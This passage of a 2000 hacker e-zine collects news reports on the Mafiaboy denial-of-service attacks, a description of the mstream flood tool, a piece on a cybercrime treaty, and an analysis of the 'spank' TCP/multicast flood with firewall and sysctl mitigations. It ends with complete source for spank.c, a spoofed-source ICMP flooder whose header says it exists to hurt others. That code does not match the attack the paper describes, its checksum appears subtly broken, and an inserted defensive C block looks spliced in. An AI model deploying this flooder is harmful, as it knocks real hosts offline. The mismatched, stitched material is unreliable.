The February attacks alarmed Internet users across the globe, cost Web sites millions of dollars in revenue and shook the electronic commerce industry because of the apparent ease with which major sites were made inaccessible.
ABC's television news division said on Tuesday that investigators were allegedly able to trace the attacks to Mafiaboy by examining the log files of a computer at a University of California, Santa Barbara, research lab that was among those used to attack CNN.com.

A hacker electronically broke into the UCSB computer on Feb. 8 and instructed it to send large amounts of traffic to CNN.com's Web site, ABC quoted campus network programmer Kevin Schmidt as saying.

Jeffrey Johnson, chief executive of Meta Secure-com Solutions, an Atlanta-based electronic commerce security firm, said that in such Web attacks, hackers usually use several ``zombie'' computers to which they had already illegally gained remote control to flood the target site with incoming streams of nuisance data.

Johnson said Mafiaboy had been well known in the hacker underground and in a popular Internet chat room for about two years. Mafiaboy stood out from others because he often bragged in the online chat room about how he planned to take down a few Web sites.

``He was looking for bragging rights. He was doing it to show that he has power,'' Johnson said.

Copyright © 2000 Reuters Limited. All rights reserved. Republication or redistribution of Reuters content, including by framing or similar means, is expressly prohibited without the prior written consent of Reuters. Reuters shall not be liable for any errors or delays in the content, or for any actions taken in reliance thereon.
@HWA

11.1 Mafiaboy:Canadian Arrest Made in February Web Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://abcnews.go.com/wire/US/reuters20000419_1950.html

WIRE:04/19/2000 10:10:00 ET

Canadian Arrest Made in February Web Attacks

MONTREAL (Reuters) - Canadian police were set to reveal details on Wednesday of an arrest made in connection with February's cyber attacks that jammed some of the Internet's most popular Web sites, amid reports the suspect is a 15-year-old known online as Mafiaboy.

The Royal Canadian Mounted Police said on Tuesday that charges had been brought against what they described only as "a person" in the cyber attacks.

"The investigation has given authorities the opportunity to bring light on Internet attacks that have strongly shaken the heart of electronic commerce worldwide, causing losses that were evaluated at many hundred millions of U.S. dollars," the force said in a statement.

The "denial-of-service" attacks on Feb. 2 shut down such popular Web sites as Yahoo! (YHOO.O), Amazon.com (AMZN.O) and eBay (EBAY.O) for hours.

In the assault, attackers meticulously obtained remote control of over computers around the world. They then used the computers to bombard the targeted Web sites, flooding them with so much data that legitimate users were temporarily denied access or service.

The Mounties declined to comment further on the arrest, but ABC News reported on Tuesday that a 15-year-old boy who used the online moniker Mafiaboy was arrested over the weekend in the Montreal area and charged on Monday.

The news division of the U.S. television network said records in the case had been sealed because of the suspect's age. Under Canada's Young Offenders Act, authorities are not allowed to reveal the identities of individuals less than 17 years of age who are charged with crimes and set to be tried in juvenile court.

The Canadian police promised to release more information at a news conference in Montreal at 10:30 a.m. EDT (1430 GMT) on Wednesday. The U.S. Justice Department and the FBI were expected to make a statement afterward. No comment was immediately available from the department.

The Mounties said their investigation included their Computer Investigation and Support Unit in Montreal, a division of the FBI, the U.S. Justice Department and U.S. National Infrastructure Protection Center.

Canadian police joined the hunt for the hackers in mid-February as investigators suspected that a Canadian server had been used in the assault.

The February attacks alarmed Internet users across the globe, cost Web sites millions of dollars in revenue and shook the electronic commerce industry because of the apparent ease with which major sites were made inaccessible.

ABC said investigators were allegedly able to trace the attacks to Mafiaboy by examining the log files of a computer at a University of California, Santa Barbara, research lab that was among those used to attack CNN.com (TWX.N).

A hacker electronically broke into the UCSB computer on Feb. 8 and instructed it to send large amounts of traffic to CNN.com's Web site, ABC quoted campus network programmer Kevin Schmidt as saying.

ABC News said the FBI obtained chat room logs allegedly showing that Mafiaboy had asked others what sites he should take down before they were attacked.

Internet security expert Michael Lyle told the network he had communicated with Mafiaboy and the 15-year-old said he had attacked not only CNN.com but also E*TRADE and several smaller Web sites.

A subscriber called Mafiaboy previously held two accounts with Delphi Supernet, a Montreal Internet service provider that Toronto-based ISP Internet Direct bought last year. The accounts were closed in March 1998 because Mafiaboy violated subscriber policies, but Internet Direct would not say what the violations were.
@HWA 11.2 Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://my.aol.com/news/story.tmpl?table=n&cat=01&id=0004190119676550 Reno Says 'Mafiaboy' Hacker Must Face Punishment Reuters Apr 19 2000 1:19PM ET WASHINGTON (Reuters) - U.S. Attorney General Janet Reno said on Wednesday a 15-year-old boy arrested in Canada for jamming the CNN.com Web site and other sites in February must face punishment. Canadian police in Montreal announced charges against the 15-year-old hacker known online as ``Mafiaboy'' for jamming the CNN.com Web site and up to 1,200 CNN-hosted sites for four hours on Feb. 8. ``I think that it's important first of all that we look at what we've seen and let young people know that they are not going to be able to get away with something like this scot-free,'' Reno told reporters on Capitol Hill. ``There has got to be a remedy, there has got to be a penalty.'' Reno said the U.S. government continued to work with industry on that incident and others, now that law enforcement has shown it can crack cyber-attack cases. ``I believe this recent breakthrough demonstrates our capacity to track down those who would abuse this remarkable new technology, and track them down wherever they may be,'' she said. @HWA 11.3 Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks, ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://more.abcnews.go.com/sections/tech/dailynews/webattacks000216.html ‘Mafiaboy’ Suspected FBI Has Evidence That He and Others Launched Web Attacks, Expert Says A customer peruses computer wares for sale at a hacker convention. The FBI is questioning hackers, computer security experts and others who might have information on last week's Web attacks. (Lori Cain/AP Photo) By Jonathan Dube Feb. 
16 — A hacker who calls himself “mafiaboy” is believed to be responsible for at least two of the attacks on leading Web sites, a security expert tells ABCNEWS.com. FBI seeks hackers in Web attacks. Chat room logs now in the possession of the FBI show that “mafiaboy” asked others what sites he should take down — before the sites were attacked, Internet security expert Michael Lyle said. In a later conversation with Lyle, mafiaboy claimed credit for attacking CNN.com, E*TRADE and several smaller sites, and he shared technical information that only someone involved in the attacks would know, Lyle said. The FBI now has reason to believe that the attacks last week that took down seven leading Web sites and at least six smaller Web sites were launched by several people, acting independently. Mafiaboy, who has been described as a 15-year-old Canadian, is believed to be a copycat who launched his attacks only after Yahoo! was knocked offline on Feb. 7. Mafiaboy’s Claims Seem Credible Dozens of hackers have claimed credit for the attacks in online chats, but Lyle says mafiaboy is the only one so far who appears to be credible. “Mafiaboy was saying ‘What should I hit next? What should I hit next?’ and people on the channel were suggesting sites, and mafiaboy was saying, ‘OK, CNN,’” said Lyle, the chief technology officer for Recourse Technologies Inc., an Internet security company in Palo Alto, Calif. “And shortly thereafter the people on the channel would be talking about CNN going down. If you look at the time stamps on the logs, they also coincide with CNN going down.” Lyle said the log files show similar discussions prior to the Feb. 9 attacks on E*TRADE and several other smaller sites. Chat room log files can be faked, but Lyle said he’s spoken with a number of others who witnessed the conversations live and verified their authenticity. 
Mafiaboy Knows Details Moreover, Lyle said he spoke with mafiaboy over the Internet last Thursday and again last Friday and those conversations bolstered the evidence against the young hacker. Mafiaboy also said he was breaking into computers that were using a program called WUFTP, which is often used to exchange data on university computers, Lyle said. Mafiaboy said these computers were using an old version of WUFTP that had security flaws in it and thus he was able to install the attack software on the computers, Lyle said. He is believed to have installed attack software called Tribal Flood Network, or TFN, on dozens of computers, making them into “zombies” that he could then instruct to launch the attacks. Lyle said mafiaboy told him specific details about the ports that he used to connect with the zombie computers and launch the attacks — information that only someone involved in the attack would know. More Than One Attacker The reason investigators believe different culprits were responsible for some of the attacks is that the software tools used to launch the attacks on Yahoo! and eBay were different than those used to attack CNN.com and E*TRADE, Lyle said. The attacks on CNN.com and E*TRADE are believed to have been launched using TFN, a software program that’s widely available on the Internet. The attacks on Yahoo! and eBay were launched using a more sophisticated set of tools, he said. Toronto-based Internet service provider Internet Direct said the Royal Canadian Mounted Police had warned it that a subscriber called “mafiaboy” previously held two accounts with Delphi Supernet, a Montreal ISP the company bought last year. The accounts were closed in March 1998 because mafiaboy violated subscriber policies, but Internet Direct would not say what the violations entailed. Lyle says he has turned his information over to the FBI and has been working with investigators. 
Based on his conversations with mafiaboy, Lyle said the teen likely committed the attacks to boost his notoriety within the hacker community. “There’s this real effort among the people on all these channels to try and stand out and look like the best hacker, or one of the best,” Lyle said. “And I think that that’s what he was searching after. That really explains why he would brag the way he did about it.” FBI Interviews ‘Coolio’ ABCNEWS has also learned that the FBI has interviewed a hacker called “coolio” in connection with last week’s Web attacks, but he denied any involvement. FBI officials told ABCNEWS’ Brian Ross they had tracked down the teenage hacker in Southern California because they believed he might have useful information for their investigation. Coolio is well known to authorities as a member of “Global Hell,” a group of teenagers who have hacked into White House and Department of Defense computer systems. The officials said members of Global Hell are still under investigation in connection with last week’s Web attacks. The FBI also wants to question a hacker known as “nachoman.” Officials have been careful to say they are not suspects, but just want to talk to them about important information relating to the attacks. Fast-Developing Leads In Washington, FBI Director Louis Freeh said today investigators are running down hundreds of leads related to the Web attacks, but still face substantial hurdles. “There are fast developing leads as we speak,” Freeh told a Senate subcommittee. Freeh said the investigation has led the FBI to at least four other countries, including Canada and Germany. He also said FBI field offices in five cities are participating in the investigation: Los Angeles, San Francisco, Atlanta, Boston and Seattle. The FBI began investigating after leading Web portal Yahoo! was attacked and made inaccessible for several hours on Feb. 7. Then, on Feb. 8, Buy.com, Amazon.com, eBay and CNN.com were assaulted. And on Feb. 
10, technology site ZDNet and online trading site E*TRADE suffered attacks. As many as 13 Web sites may have been attacked. Known as denial-of-service attacks, the assaults effectively overloaded Web sites with mock traffic so that real users couldn’t access the sites. The culprits took over computers in various parts of the world and used them to bombard the victims’ sites with data. Investigators have located more than a half-dozen computers used in last week’s attacks. Computers at two California universities, a Midwestern school, a Berlin university, a non-university site in Southern California, a home business in Oregon, and machines at least four companies were used as “zombies.” @HWA 11.4 Mafiaboy:Hacker cripples Area 51 site for 36 hours ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 04/21/00- Updated 11:36 AM ET Hacker cripples Area 51 site for 36 hours RALEIGH, N.C. (AP) - A hacker disrupted service for 36 hours to the Web site that displays detailed satellite images of Area 51, the top-secret Air Force site in Nevada. Raleigh-based Aerial Images Inc. said the hacker struck six hours after five images of the desert proving ground were loaded Monday night onto the site, www.terraserver.com. The attack, combined with traffic 10 times what the site usually bears, meant millions of people had difficulty accessing the site or could not connect with it at all, company officials said. Service was disrupted until Thursday. ''I won't tell you it's completely solved,'' said John Hoffman, Aerial Images president. ''We've taken steps to mitigate its effect. It's almost a fact of being online these days.'' Hoffman declined to provide details of the attack, citing an ongoing investigation. The Air Force only recently acknowledged that Groom Dry Lake Air Force Base even exists. Among UFO aficionados, it has long been known simply as Area 51, the base's designation on old Nevada test site maps. 
They believe that unidentified flying objects from other worlds are hidden there.

@HWA

xx.x [ISN] Clearing up questions about denial of service attacks
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[Forwarded by: Mark Arena ]

Hi all,

I just thought I'd clear up all these rumors, questions etc regarding the denial of service attacks which happened a while ago.

1) Did mafiaboy use trinoo or smurf?

He didn't use either. He used a program called mstream and yes it's private. It basically is similar to trinoo. It comprises of a client and a server. With the server it listens on port 7983 and you specify the hosts which will connect to the server on that port. For that reason you must have been added to the server to packet from it. On the server.c program it appears like this:

char *m[]={
  "1.1.1.1", /* first master */
  "2.2.2.2", /* second master */
  "3.3.3.3", /* third master etc */
  0 };

Now as for the client you can define a password, serverfile and max number of users to use the client at one time. The client then connects to the servers and gets the servers to send all crap data to the host you specify and hence if you got enough servers will take them down eg as mafiaboy did.

2) So did mafiaboy actually hack anything?

The answer is yes. All the machines he installed the server on he had to have root. Therefore he must have hacked a lot of machines in preparation for the attack on the sites.

3) Did mafiaboy take out all the sites?

No, mafiaboy only took out yahoo, etrade and some others which I can't remember. Coolio took out the rest. No matter what you're told I assure you Coolio took out the rest.

4) How come it took so long for mafiaboy to get arrested?

Simple, he hanged low and the fbi etc had not enough evidence to make an arrest, that was until his outburst on self-evident's msg board. This allowed the fbi etc to swoop swiftly and quickly.

Now it's time for my opinion:

1) Do you think mafiaboy will get convicted?
Well it depends, if mafiaboy admits to dos'ing those sites then yes I believe he will be convicted then again if he denies it I believe they won't have enough evidence on him. The only reason they caught him is that his nick etc was posted on www.self-evident.com He also said to a person I know that he destroyed the hard drive in a fire which would give the fbi no physical evidence at his end. Mafiaboy's story: Here is a quick rephraze of what mafiaboy has said in channels before he got arrested. His nick has been edited out for various reasons. <> god fucking damnit <> i wish i can go back in time <> and undo what i did In closing I'll tell you how I know this. Firstly I have spoken to people associated with mafiaboy. I also have the program which he used to take out the sites and no I won't send you it. Any other questions etc direct them to me and i'll try answering them. ------------------------------------------------------- Mark Arena marena@iinet.net.au ------------------------------------------------------- @HWA 13.0 [MM] Cybercrime Solution Has Bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/politics/0,1283,36047,00.html Cybercrime Solution Has Bugs by Declan McCullagh 3:00 a.m. May. 3, 2000 PDT WASHINGTON -- U.S. and European police agencies will receive new powers to investigate and prosecute computer crimes, according to a preliminary draft of a treaty being circulated among over 40 nations. The Council of Europe's 65KB proposal is designed to aid police in investigations of online miscreants in cases where attacks or intrusions cross national borders. But the details of the "Draft Convention on Cybercrime" worry U.S. civil libertarians. They warn that the plan would violate longstanding privacy rights and grant the government far too much power. 
The proposal, which is expected to be finalized by December 2000 and appears to be the first computer crime treaty, would: Make it a crime to create, download, or post on a website any computer program that is "designed or adapted" primarily to gain access to a computer system without permission. Also banned is software designed to interfere with the "functioning of a computer system" by deleting or altering data. Allow authorities to order someone to reveal his or her passphrase for an encryption key. According to a recent survey, only Singapore and Malaysia have enacted such a requirement into law, and experts say that in the United States it could run afoul of constitutional protections against self-incrimination. Internationalize a U.S. law that makes it a crime to possess even digital images that "appear" to represent children's genitals or children engaged in sexual conduct. Linking to such a site also would be a crime. Require websites and Internet providers to collect information about their users, a rule that would potentially limit anonymous remailers. U.S. law enforcement officials helped to write the document, which was released for public comment last Thursday, and the Justice Department is expected to urge the Senate to approve it next year. Other non-European countries actively involved in negotiations include Canada, Japan, and South Africa. During recent testimony before Congress, Attorney General Janet Reno warned of international computer crime, a claim that gained more credibility last month with the arrest of alleged denial-of-service culprit Mafiaboy in Canada. "The damage that can be done by somebody sitting halfway around the world is immense. We have got to be able to trace them, and we have made real progress with our discussions with our colleagues in the G-8 and in the Council of Europe," Reno told a Senate appropriations subcommittee in February, the week after the denial-of-service attacks took place. 
"Some countries have weak laws, or no laws, against computer crimes, creating a major obstacle to solving and to prosecuting computer crimes. I am quite concerned that one or more nations will become 'safe havens' for cyber-criminals," Reno said. Civil libertarians say the Justice Department will try to pressure the Senate to approve the treaty even if it violates Americans' privacy rights. "The Council of Europe in this case has just been taken over by the U.S. Justice Department and is only considering law enforcement demands," says Dave Banisar, co-author of The Electronic Privacy Papers. "They're using one more international organization to launder U.S. policy." Banisar says Article 6 of the measure, titled "Illegal Devices," could ban commonplace network security tools like crack and nmap, which is included with Linux as a standard utility. "Companies would be able to criminalize people who reveal security holes about their products," Banisar said. "I think it's dangerous for the Internet," says Barry Steinhardt, associate director of the American Civil Liberties Union and a founder of the Global Internet Liberty Campaign. "I think it will interfere with the ability to speak anonymously." "It will interfere with the ability of hackers -- using that term in a favorable light -- to test their own security and the security of others," Steinhardt said. Solveig Singleton, director of information studies at the libertarian Cato Institute says it's likely -- although because of the vague language not certain -- that anonymous remailers will be imperiled. The draft document says countries must pass laws to "ensure the expeditious preservation of that traffic data, regardless whether one or more service providers were involved in the transmission of that communication." A service provider is defined as any entity that sends or receives electronic communications. Representing the U.S. 
in the drafting process is the Justice Department's Computer Crime and Intellectual Property section, which chairs the G-8 subgroup on high-tech crime and also is involved with a cybercrime project at the Organization of American States. In December 1997 Reno convened the first meeting on computer crime of the G-8 nations.

A recent White House working group, which includes representatives from the Justice Department, FBI, and Secret Service has called for restrictions on anonymity online, saying it can provide criminals with an impenetrable shield. So has a report from a committee of the European Parliament.

Other portions of the treaty include fairly detailed descriptions of extradition procedures and requirements for countries to establish around-the-clock computer-crime centers that police groups in other countries may contact for immediate help.

The Council of Europe is not affiliated with the European Union, and includes over 40 member nations, including Russia, which joined in 1996. After the Council of Europe's expert group finalizes the proposed treaty, the full committee of ministers must adopt the text. Then it will be sent to countries for their signatures.

Comments can be sent to daj@coe.int.

@HWA

14.0 [IND] The new spank.c DoS attack tool source and an analysis paper by 1st
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

------------------------------------------------
Explanation of the 'spank' attack -- a new breed stream/raped
------------------------------------------------

By: lst (yardley@uiuc.edu)

This is a tad different than the previous release. Stream/Raped merely flooded the host with ack's (or no flags) and came from random ips with random sequence numbers and/or ack numbers. The difference now is that this not only does the previous stuff, but also directly attacks from and to multicast addresses as well. Just as before, rate limiting should be done to counteract its effect (the same idea as ICMP_BANDLIM).
The multicast handling should also be checked to verify that it is behaving properly.

The attacker specifies the port[s] that they want to send the attack to; depending on what ports are selected, you will have different net results. If the port is an open port, then you will possibly have a longer kernel path to follow before the drop. Therefore, a smart attacker will hit open ports, but havoc can also come about from random ports due to states and processing.

In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops. In the worst case, you lockup, kill the network, and possibly have to reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate--bandlim type idea). In other words, you go to the drop routine instead of dropwithrst silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect).

The filters that were presented at the beginning of this email will block all multicast packets that come out (and in) the tcp stack.

I have been getting mailed a lot about this. Here is why I said the previous statement. Receiving a packet with no flags is considered an illegal packet (obviously) and is often dumped, however, as we have seen in the past, illegal packets often wreak havoc and often go untested.

There is very little that "raped.c" or "stream.c" actually showed as problems in the TCP/IP stacks. The true problem lies more in the effects of the response (caused by the attack). This is the same concept as the SYN floods of yesteryear, and the same type of thing will be done to handle it. The main difference is that it will be on a simpler note because there isn't much need for a "cookie" based system.
One should just throttle the response of the reset packets which in turn will help stop the storm that you generate and in general, harden the tcp/ip stack to behave the way it is supposed to.

The main effect of this attack is that you are shooting back RST+ACK's at all the spoofed hosts. Obviously, a lot of these hosts will not exist and you will get ICMP unreaches (as an example) bounced back at you. There are other possibilities as well, but unreach would be the most common (redirects might be common as well although I did not spend the time to analyze that). The ones that don't respond back may send you some packets back as well (depending on if the port was valid or not and what their firewall rules are). This type of attack is complicated by the multicasts, and the effect is amplified as well. All in all, it becomes very nasty very quick. Basically, this causes a nice little storm of packets, in the ideal case.

Note that I said ideal case in the previous paragraph. This is not always the observed behavior. It all depends on what is on the subnet, what type of packets are received, what rules and filters you have setup, and even the duration of the flood. It has been pointed out several times that the machine will go back to normal once the attack is stopped, which is exactly why something like ICMP_BANDLIM will work.

I have also been asked a lot about what this "bug" affects. I have seen it have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has also seemed to affect some hubs, switches, routers, or gateways since entire subnets have "disappeared" briefly after the attack. The multicast attack seems to be more deadly to the network than the previous attack and its effects get amplified and even carried over to the rest of the network (bypassing secluded network bounds).
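An added illustration, not code from the paper or from any vendor patch: a user-space C model of the hardening the paper argues for (silently drop TCP segments to or from multicast addresses, do the listening-socket lookup only for a bare SYN, and rate-limit RST replies the way ICMP_BANDLIM limits ICMP). All names, the 200-per-second limit and the constructed stray segments are assumptions; nothing is sent on the network.

```c
/* Added example: model of the drop / dropwithrst decision for segments that
 * match no existing connection. Names are hypothetical; addresses are in
 * host byte order. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define TCPF_SYN 0x02
#define TCPF_RST 0x04
#define TCPF_ACK 0x10

enum verdict { V_ACCEPT, V_DROP, V_DROP_WITH_RST };

struct segment { uint32_t src, dst; uint16_t dport; uint8_t flags; };

struct rst_limiter {            /* fixed one-second window, ICMP_BANDLIM style */
    uint32_t limit_per_sec;
    uint64_t window;            /* the second the counter belongs to */
    uint32_t sent;
    uint64_t suppressed;
};

struct stack {
    const uint16_t *listen_ports;
    size_t n_listen;
    unsigned listener_lookups;  /* how often the socket table was searched */
    struct rst_limiter rl;
};

/* 224.0.0.0/4 is the whole IPv4 multicast range. */
static int is_multicast(uint32_t a) { return (a & 0xf0000000u) == 0xe0000000u; }

static int rst_allowed(struct rst_limiter *rl, uint64_t now_sec)
{
    if (now_sec != rl->window) { rl->window = now_sec; rl->sent = 0; }
    if (rl->sent >= rl->limit_per_sec) { rl->suppressed++; return 0; }
    rl->sent++;
    return 1;
}

static int is_listening(struct stack *st, uint16_t port)
{
    st->listener_lookups++;
    for (size_t i = 0; i < st->n_listen; i++)
        if (st->listen_ports[i] == port) return 1;
    return 0;
}

void stack_init(struct stack *st, const uint16_t *ports, size_t n, uint32_t limit)
{
    st->listen_ports = ports; st->n_listen = n; st->listener_lookups = 0;
    st->rl.limit_per_sec = limit; st->rl.window = 0;
    st->rl.sent = 0; st->rl.suppressed = 0;
}

enum verdict classify(struct stack *st, const struct segment *seg, uint64_t now_sec)
{
    /* 1. Multicast is never valid for TCP: drop silently, no reply. */
    if (is_multicast(seg->src) || is_multicast(seg->dst))
        return V_DROP;
    /* Standard TCP behaviour (not from the paper): never answer a RST. */
    if (seg->flags & TCPF_RST)
        return V_DROP;
    /* 2. Only a bare SYN is worth a listening-socket lookup. */
    if ((seg->flags & (TCPF_SYN | TCPF_ACK)) == TCPF_SYN &&
        is_listening(st, seg->dport))
        return V_ACCEPT;
    /* 3. Everything else would earn a RST: throttle the replies. */
    return rst_allowed(&st->rl, now_sec) ? V_DROP_WITH_RST : V_DROP;
}

/* Classify n constructed stray segments (ACK-only or flagless, every fourth
 * one with a multicast source) within one second; returns RST replies. */
unsigned replay_strays(struct stack *st, unsigned n, uint64_t now_sec)
{
    unsigned rsts = 0;
    for (unsigned i = 0; i < n; i++) {
        struct segment s;
        s.src   = (i % 4 == 0) ? 0xe0000001u + i : 0x0a000000u + i;
        s.dst   = 0xc0000201u;                  /* 192.0.2.1, documentation range */
        s.dport = 80;
        s.flags = (i & 1) ? TCPF_ACK : 0;
        if (classify(st, &s, now_sec) == V_DROP_WITH_RST) rsts++;
    }
    return rsts;
}

int main(void)
{
    static const uint16_t ports[] = { 22, 80 };
    struct stack st;
    struct segment syn = { 0xc6336407u, 0xc0000201u, 80, TCPF_SYN };

    stack_init(&st, ports, 2, 200);
    unsigned rsts = replay_strays(&st, 1000, 100);
    printf("RST replies: %u, suppressed: %llu, listener lookups: %u\n",
           rsts, (unsigned long long)st.rl.suppressed, st.listener_lookups);
    printf("SYN to open port during the flood: %s\n",
           classify(&st, &syn, 100) == V_ACCEPT ? "accepted" : "dropped");
    return 0;
}
```

With the limit in place the host answers at most 200 of the 1000 stray segments in that second, never searches the socket table for them, and still accepts a legitimate SYN.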
I don't have more specifics on the systems affected because of the difficulty in testing it (and keeping the network up) since I do not have local access to the networks that I tested on, and remote access gets real ugly real fast.

Another possibility that has been suggested as to why some machines die is that the machine's route table is being blown up by the spoofed packets. Each spoofed packet has a different source address which means that a temporary route table entry is being created for each one. These entries take time to timeout. Use 'vmstat -m' and check the 'routetbl' field while the attack is going on.

Route table entries can be controlled somewhat under freebsd with:

[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128

You can do the following, to help if the route table is at least part of the problem:

sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2

Things that will help:

1. Drop all multicast packets (ingress and egress) that are addressed to the tcp stack because multicasts are not valid for tcp.
2. Extend bandwidth limiting to include RST's, ACK's and anything else that you feel could affect the stability of the machine.
3. Don't look for listening sockets if the packet is not a syn

I hope that this helps, or explains a little more at least.

---------------------------------------------------
Temporary remedy
---------------------------------------------------

If you use ipfilter, this MAY help you, but the issue is quite a bit different than the previous issue.
-- start rule set --
# 224.0.0.0/4 covers the whole IPv4 multicast range (224.0.0.0 - 239.255.255.255)
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/4 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --

Optionally, a rule like the following could be inserted to handle outgoing packets (if they send from the firewall somehow) but you have bigger problems than the attack if that is the case.

-- start additional rule --
block out proto tcp from any to 224.0.0.0/4
-- end additional rule --

That will help you "stop" the attack (actually it will just help minimize the effects), although it will still use some CPU.

Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter (or any other state based firewall) to stop it. Otherwise, wait for vendor patches or read more about the explanation for other possible workarounds.

FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff

-----------------------
Conclusion
-----------------------

This bug was found in testing. It seems a bit more lethal than the previous and should be addressed as such. Patches should be available now, but I do not follow all the platforms.

--------------------
References
--------------------

This was done independently, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due. The following people contributed in some way or another:

Brett Glass
Alfred Perlstein
Warner Losh
Darren Reed
Don Lewis

Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)

-------------------
Attached
-------------------

These programs are for the sake of full disclosure, don't abuse them. Spank was written with libnet, so you will need to obtain that as well.
You can find that at http://www.packetfactory.net/libnet

For an "unofficial" patch:
http://www.w00w00.org/files/spank/don_lewis_tcp.diff

For spank.c:
http://www.w00w00.org/files/spank/spank.c

-=-

/*
 * spank.c by fred_ | blasphemy
 *
 * @@@@@@ @@@@@@@ @@@@@@ @@@ @@@ @@@ @@@
 * @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ @@@ @@@ @@@
 * !@@ @@! @@@ @@! @@@ @@!@!@@@ @@! !@@
 * !@! !@! @!@ !@! @!@ !@!!@!@! !@! @!!
 * !!@@!! @!@@!@! @!@!@!@! @!@ !!@! @!@@!@!
 * !!@!!! !!@!!! !!!@!!!! !@! !!! !!@!!!
 * !:! !!: !!: !!! !!: !!! !!: :!!
 * !:! :!: :!: !:! :!: !:! :!: !:!
 * :::: :: :: :: ::: :: :: :: :::
 * :: : : : : : : :: : : :::
 *
 * This program is not for educational use
 * in any shape or form. You must agree that
 * you will only use it to hurt others.
 *
 * Warning, this program uses alot of bandwidth.
 *
 * usage: ./spank
 *
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

static int in_cksum(u_short *addr, int len);
static void fill(int datalen, char *icmp_data);

#define PHDR_LEN sizeof(struct icmphdr) + sizeof(struct iphdr)

static void fill(int datalen, char *icmp_data)
{
    static u_int32_t rnd;
    int i;

    for (i = PHDR_LEN; i < datalen; i++) {
        rnd = (3141592621U * rnd + 663896637U);
        icmp_data[i] = rnd>>24;
    }
}

int main(int argc, char *argv[])
{
    int count = 0, sock, x;
    struct sockaddr_in sin;

    fprintf(stdout, "spank.c coded by fred_ | blasphemy\n");

    if (argc != 4) {
        fprintf(stderr, "ex., %s \n", argv[0]);
        exit(1);
    }

    if (atoi(argv[3]) < 1) {
        fprintf(stderr, "error: packet size is too small.\n");
        exit(1);
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(0);
    sin.sin_addr.s_addr = get_addr(argv[2]);

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) {
        perror("socket()");
        exit(1);
    }

    setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &x, sizeof(x));

    printf("each '.' is 25 packets\n");

    while (1) {
        send_packet(argv[1], atoi(argv[3]), sin, sock);
        count++;
        if (count == 25) {
            printf(".");
            fflush(stdout);
            count = 0;
        }
        usleep(10);
    }
}

int get_addr(char *host)
{
    static struct in_addr h;
    struct hostent *hp;

    h.s_addr = inet_addr(host);
    if (h.s_addr == -1) {
        hp = gethostbyname(host);
        if (hp == NULL) {
            fprintf(stderr, "unable to resolve %s.\n", host);
            exit(1);
        }
        bcopy(hp->h_addr, (char *)&h.s_addr, hp->h_length);
    }
    return h.s_addr;
}

int send_packet(char *src, int size, struct sockaddr_in sin, int sock)
{
    char *packet;
    struct icmphdr *icmp;
    struct iphdr *ip;

    packet = (char *) malloc(PHDR_LEN + size);
    ip = (struct iphdr *)packet;
    icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
    memset(packet, 0, PHDR_LEN);
    fill(size, packet);

    ip->tot_len = htons(PHDR_LEN + size);
    ip->ihl = 5;
    ip->ttl = 255;
    ip->protocol = IPPROTO_ICMP;
    ip->version = 4;
    ip->tos = 0;
    ip->frag_off = 0;
    ip->saddr = get_addr(src);
    ip->daddr = sin.sin_addr.s_addr;
    ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));

    icmp->type = 8;
    icmp->code = 1;
    icmp->checksum = in_cksum((u_short *)icmp, sizeof(struct icmphdr));

    if (sendto(sock, packet, PHDR_LEN + size, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1) {
        close(sock);
        perror("sendto()");
        exit(1);
    }
    free(packet);
}

static int in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register int sum = 0;
    u_short answer = 0;

    while (nleft > 1) {
        sum += *addr++;
        nleft -= 2;
    }

    if (nleft == 1) {
        *(u_char *) (&answer) = *(u_char *) addr;
        sum += answer;
    }

    sum = (sum >> 16) + (sum + 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return (answer);
}

@HWA

15.0 [IND] RFParalyse.c:Cause undesired effects remotely against Win9x;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: http://www.wiretrip.net/rfp/
